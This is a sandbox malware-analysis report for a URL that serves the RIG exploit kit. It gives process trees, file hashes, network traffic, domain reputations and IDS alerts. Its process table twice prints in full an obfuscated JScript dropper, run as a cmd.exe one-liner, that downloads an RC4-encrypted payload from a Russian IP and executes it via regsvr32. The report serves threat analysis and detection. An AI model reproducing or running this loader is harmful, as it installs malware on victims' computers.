URL: | http://hatscripts.com/addskype |
Full analysis: | https://app.any.run/tasks/c96e4220-e219-46f3-85eb-69a2e4ea7550 |
Verdict: | Malicious activity |
Analysis date: | March 31, 2020, 10:30:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MD5: | 1A53DA15EC82B6E1E30C4BDDDD5F1DAA |
SHA1: | B0D6CF3E24F2B919D00F13A794C2134074AC1E59 |
SHA256: | 86AA15EABC8172D6E42E9DCB7508603FA56457F57AAF8C10BE8F1E8BF8DE196B |
SSDEEP: | 3:N1KWE7MVRqIKEH:CW0M7q0H |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2644 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://hatscripts.com/addskype" | C:\Program Files\Internet Explorer\iexplore.exe | | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1168 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION — the content process crashed) Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1940 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j)["slice"](1)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(31^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xX){};q.Deletefile(K);>1.tmp && stArt wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?MTQzODY2&oIFdNkOG&IqSFO=difference&RZVfidj=electrical&BnntY=everyone&ztWfPIsi=mustard&blg=neighboring&hGvLns=professional&plztpHosK=abettor&gCWxdj=disagree&TdePiUyB=irreverent&t4gfgfdf4=qLbJWaQbhikyDewZpnohcBwhFpf2o2BXQmESbhp7QrxeMZAN19pGRF7E83VjFkvEXefs&EHWcsNaUX=abettor&f54hgffs=wHfQMvXcJwDHFYbGMvrESKNbNknQA0GPxpH2_drZdZqxKGni2Ob5UUSk6FWCEh3hpPE&gPAediV=irreverent&RAVzQOe=filly&TwxNNTcwMDYz" "¤" | C:\Windows\system32\cmd.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1064 | wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?MTQzODY2&oIFdNkOG&IqSFO=difference&RZVfidj=electrical&BnntY=everyone&ztWfPIsi=mustard&blg=neighboring&hGvLns=professional&plztpHosK=abettor&gCWxdj=disagree&TdePiUyB=irreverent&t4gfgfdf4=qLbJWaQbhikyDewZpnohcBwhFpf2o2BXQmESbhp7QrxeMZAN19pGRF7E83VjFkvEXefs&EHWcsNaUX=abettor&f54hgffs=wHfQMvXcJwDHFYbGMvrESKNbNknQA0GPxpH2_drZdZqxKGni2Ob5UUSk6FWCEh3hpPE&gPAediV=irreverent&RAVzQOe=filly&TwxNNTcwMDYz" "¤" | C:\Windows\system32\wscript.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
272 | "C:\Windows\System32\cmd.exe" /c regsvr32.exe /s uw9upa34.dll | C:\Windows\System32\cmd.exe | — | wscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 3 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3772 | regsvr32.exe /s uw9upa34.dll | C:\Windows\system32\regsvr32.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft(C) Register Server Exit code: 3 (for regsvr32, exit code 3 means LoadLibrary failed — the dropped DLL most likely did not load in this run; confirm against the dropped file) Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3916 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:4068620 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION — the content process crashed) Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3028 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2644 CREDAT:3478802 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
3488 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j)["slice"](1)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(31^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xX){};q.Deletefile(K);>1.tmp && stArt wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?NDAyMzc1&dLVnee&WiRmw=abettor&uBagg=mustard&NFhybWdr=community&yJo=border&rXKr=irreverent&f54hgffs=w3fQMvXcJxnQFYbGMvzDSKNbNknWHViPxoeG9MildZaqZGX_k7XDfF-qoVvcCgWRxft8L&qKvOEq=everyone&TcNWU=filly&eVvfTlXf=mustard&t4gfgfdf4=7JQOwu1iEWJeA1hn4ZfU11Gpf_82kaDnRPN0pGF9EffYw1E-qKQHLg82Vr0yLYkLYsk9w&McHbYQS=callous&tieW=abettor&gvg=everyone&lnKV=accelerator&awNTyMzU1Nzkw" "¤" | C:\Windows\system32\cmd.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3448 | wsCripT //B //E:JScript 1.tmp "saN9km3wuzfgdfg" "http://185.43.4.167/?NDAyMzc1&dLVnee&WiRmw=abettor&uBagg=mustard&NFhybWdr=community&yJo=border&rXKr=irreverent&f54hgffs=w3fQMvXcJxnQFYbGMvzDSKNbNknWHViPxoeG9MildZaqZGX_k7XDfF-qoVvcCgWRxft8L&qKvOEq=everyone&TcNWU=filly&eVvfTlXf=mustard&t4gfgfdf4=7JQOwu1iEWJeA1hn4ZfU11Gpf_82kaDnRPN0pGF9EffYw1E-qKQHLg82Vr0yLYkLYsk9w&McHbYQS=callous&tieW=abettor&gvg=everyone&lnKV=accelerator&awNTyMzU1Nzkw" "¤" | C:\Windows\system32\wscript.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1168 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Low\Cab74F9.tmp | — | |
MD5:— | SHA256:— | |||
1168 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Low\Tar74FA.tmp | — | |
MD5:— | SHA256:— | |||
1168 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\4IT734EV.txt | — | |
MD5:— | SHA256:— | |||
2644 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_CBB16B7A61CE4E298043181730D3CE9B | der | |
MD5:FCAB8978DFC89E03C4605B91B9F1C6D0 | SHA256:E8D004CDEAA061C2574F2EA588FD7F923D7D8A810B1CE7BA59BA877CF18F4A03 | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D | der | |
MD5:85C2FF2165EE33525CA83481A1D34237 | SHA256:DB74E85956D511E4B809197EEE82E89106DEADACE38242B714C47C361990F03D | |||
1168 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\WQ37RWQU.htm | binary | |
MD5:347433012A2F3F0100DA3869EA042D9C | SHA256:924126BD8D58DEC36F6E3CDB9114986654660916897087D03B64DC6FDCD896B7 | |||
3916 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\DY534W2X\PJ5UD15E.htm | binary | |
MD5:B0EA96ACC4B90019D57A77535CD3CE28 | SHA256:E7C415DB886A44CD6641D919B4900B9A80C44BD8E5BA42B41F14F5776BBB841A | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_CBB16B7A61CE4E298043181730D3CE9B | binary | |
MD5:62BA3A6CCCE2306CED328719A2A8327B | SHA256:83BFB066C4937190EBA2D3C1AE05B3CBFF0C48A1346F4F20544526E165249CEF | |||
1168 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3FD4FFC3A0CC391E690D565826E5967C | binary | |
MD5:07ED9B724CA8AC3802B04CE084721800 | SHA256:9E036F17BE6A40F06CF586CA4F4DB8F971BA4BC93359AD296ADDE3CE44D93B1C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1168 | iexplore.exe | GET | 200 | 151.139.128.14:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D | US | der | 727 b | whitelisted |
1168 | iexplore.exe | GET | 302 | 185.220.35.26:80 | http://cryptomoneyinsider.site/gdte68712?cpm_id=365761694&cpm_cost=0.0022 | unknown | — | — | suspicious |
1168 | iexplore.exe | GET | 302 | 173.192.101.24:80 | http://p238000.infopicked.com/adServe/domainClick?ai=SW638O8pacUtS_ldBgyhBpTSyIczZgkcXtd1fM7xIyjhH2lrXnMnkh75ATebP4SwFVrqfE8eN9gXYM5Pwp2-JP3jsY_hOxPbo17Oq_C2YYolHrl1k_0_osek1CPPi_-NcakkaUIsChYyfOhVm5x7y0PZyADEdsLDP0s6MBsFTTDG6_ipaVE293T8kBtBPpjblyI71uBy5LXJTrvlt7JuIaJWkFFJwO7cU1pxb3PFAKi7xkknbBc1ATxhQCZ3jHf0nhs5VkCzKXfIjioiqjtWE3dLfTADdXX8-I-AMnVxsjOh_mT7TnSprhw5VnIYUcWmwfAUn4IMkXwf5kmd0MUC_Dt8ahIHnyiAUgQqhF2aY5YhYzcek6I_ZB7R8XS5oltF6ME15HHZ8mol_FQFCdABpu0Y1V3DK1_LYPbwW8hssrXv1A8tql3atcNE32FFqfQJJGP0FU6eM45LITCViTWH5hltjPnnWR7AZDnNDfJAAE7SIcvuU3EsYJB5PDS6R6Mk1ENWpjZj46exj0PwWlfnFU6AQkiKqGVWCM44Fw-x8jFUmREz65PZ5xxXFrwZ8TE5dL53LUWHU9T_DZyrVAFVfEhcM9ZyFjF3sj5__MV4XWCiB3FWHMEq7TjcoCMkPvtBPfehADqi6Kugxm5h6JbQ3a9FPDcZEJvUPPTL4O5BA2Kxlu-XFIMyCDgX_vcNp4gZbSSrcqzmByMpcC4h0nZnkyNB1felONExdRePfirJtYMCozyvMhv4-LlU-hBqlV3wbM7TR-A6o2LnrG8E1DfQ9TFH1Jw92wJrgxUUApIdmTWJScwobXG_fQczRqH3vfyD4QLn_pNd8TijIQ6n-5BK5kGhfoFAXzSI8w_UxUCEvTTxS8Ymtt-YjLLE6EbASi2Jh9nfAGWBTqoANFHpJvqyo9347mfhgNbxZuDK-Dk20eQlVRFEktQBWBaf4XymfSdAQOGScGtJTvTwrHjoweW6kMVs93JCm1oFL1MFGZv6CjWFv_aZQC5A4r4FDOdw858tImbOeXz24ZVRY0XLI-w26tWjri88Beg6ZonWe_Vtl9HYgG7afTXkyA&ui=tmxvfbadWlkLtgv3D3v8v0sRZ2xs6kJzLWXp3on882KiNKxwAofaTOAkclPMId75sTlk5A_u9iJ5qRPCRU2Bf6y1MPlOw0E0HOBUOgsVQp5MPyUCqbPIQtj4jUj50FWCdLBACwpV--8&si=1&oref=7b4af67c19877b1fcf0376ba9906a129&rb=nOW5tkIQJf4&rr=0&isco=t | US | — | — | suspicious |
1168 | iexplore.exe | GET | 200 | 151.139.128.14:80 | http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQD1UO%2BwbfMiA%2FILHe8EOtNb | US | der | 472 b | whitelisted |
1168 | iexplore.exe | GET | 302 | 69.16.230.42:80 | http://hatscripts.com/addskype | US | — | — | malicious |
1168 | iexplore.exe | GET | 200 | 151.139.128.14:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D | US | der | 471 b | whitelisted |
3916 | iexplore.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/?NDgwMTk1&VWUwFGiV&qjiPpuFt=disagree&f54hgffs=xXnQMvWbbRXQA53EKv3cT6NCMVHRFECL2YmdmrHXefjaclWkzrXFTF_7ozKAQwSG6_ttdfJ&UWdvYyKlH=mustard&t4gfgfdf4=YDVLji0WAfQw1mY5UW1kT8aqmjEnUnESb1sXW-0PZZAMUrZWdHeNp31_0yrgkQPsug1TH4GI&Vlv=filly&zglPem=difference&KgZXAxPN=dinamic&GhHCkcAI=disagree&tctbGQwA=abettor&kAbvonjM=neighboring&JPqYagIh=irreverent&FOXklOl=professional&XHWEzo=callous&HDwuUxq=electrical&qLfKrzrUNDA5OTAx | RU | binary | 41.5 Kb | suspicious |
1168 | iexplore.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/?NDgwMTk1&VWUwFGiV&qjiPpuFt=disagree&f54hgffs=xXnQMvWbbRXQA53EKv3cT6NCMVHRFECL2YmdmrHXefjaclWkzrXFTF_7ozKAQwSG6_ttdfJ&UWdvYyKlH=mustard&t4gfgfdf4=YDVLji0WAfQw1mY5UW1kT8aqmjEnUnESb1sXW-0PZZAMUrZWdHeNp31_0yrgkQPsug1TH4GI&Vlv=filly&zglPem=difference&KgZXAxPN=dinamic&GhHCkcAI=disagree&tctbGQwA=abettor&kAbvonjM=neighboring&JPqYagIh=irreverent&FOXklOl=professional&XHWEzo=callous&HDwuUxq=electrical&qLfKrzrUNDA5OTAx | RU | binary | 41.4 Kb | suspicious |
3448 | wscript.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/?NDAyMzc1&dLVnee&WiRmw=abettor&uBagg=mustard&NFhybWdr=community&yJo=border&rXKr=irreverent&f54hgffs=w3fQMvXcJxnQFYbGMvzDSKNbNknWHViPxoeG9MildZaqZGX_k7XDfF-qoVvcCgWRxft8L&qKvOEq=everyone&TcNWU=filly&eVvfTlXf=mustard&t4gfgfdf4=7JQOwu1iEWJeA1hn4ZfU11Gpf_82kaDnRPN0pGF9EffYw1E-qKQHLg82Vr0yLYkLYsk9w&McHbYQS=callous&tieW=abettor&gvg=everyone&lnKV=accelerator&awNTyMzU1Nzkw | RU | binary | 263 Kb | suspicious |
2644 | iexplore.exe | GET | 200 | 185.43.4.167:80 | http://185.43.4.167/favicon.ico | RU | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1168 | iexplore.exe | 185.220.35.26:80 | cryptomoneyinsider.site | — | — | suspicious |
1168 | iexplore.exe | 173.192.101.24:80 | infopicked.com | SoftLayer Technologies Inc. | US | suspicious |
1168 | iexplore.exe | 69.16.230.42:80 | hatscripts.com | Liquid Web, L.L.C | US | malicious |
1168 | iexplore.exe | 185.43.4.167:80 | — | JSC ISPsystem | RU | suspicious |
1168 | iexplore.exe | 173.192.101.24:443 | infopicked.com | SoftLayer Technologies Inc. | US | suspicious |
1168 | iexplore.exe | 151.139.128.14:80 | ocsp.usertrust.com | Highwinds Network Group, Inc. | US | suspicious |
3916 | iexplore.exe | 185.43.4.167:80 | — | JSC ISPsystem | RU | suspicious |
1064 | wscript.exe | 185.43.4.167:80 | — | JSC ISPsystem | RU | suspicious |
— | — | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
— | — | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
hatscripts.com | | malicious |
infopicked.com | | whitelisted |
ocsp.usertrust.com | | whitelisted |
ocsp.sectigo.com | | whitelisted |
p238000.infopicked.com | | suspicious |
cryptomoneyinsider.site | | suspicious |
api.bing.com | | whitelisted |
www.bing.com | | whitelisted |
iecvlist.microsoft.com | | whitelisted |
r20swj13mr.microsoft.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
1168 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017 |
1064 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
1064 | wscript.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (xa4) |
3916 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Jun 13 2017 |
3448 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3448 | wscript.exe | Potentially Bad Traffic | ET USER_AGENTS Observed Suspicious UA (xa4) |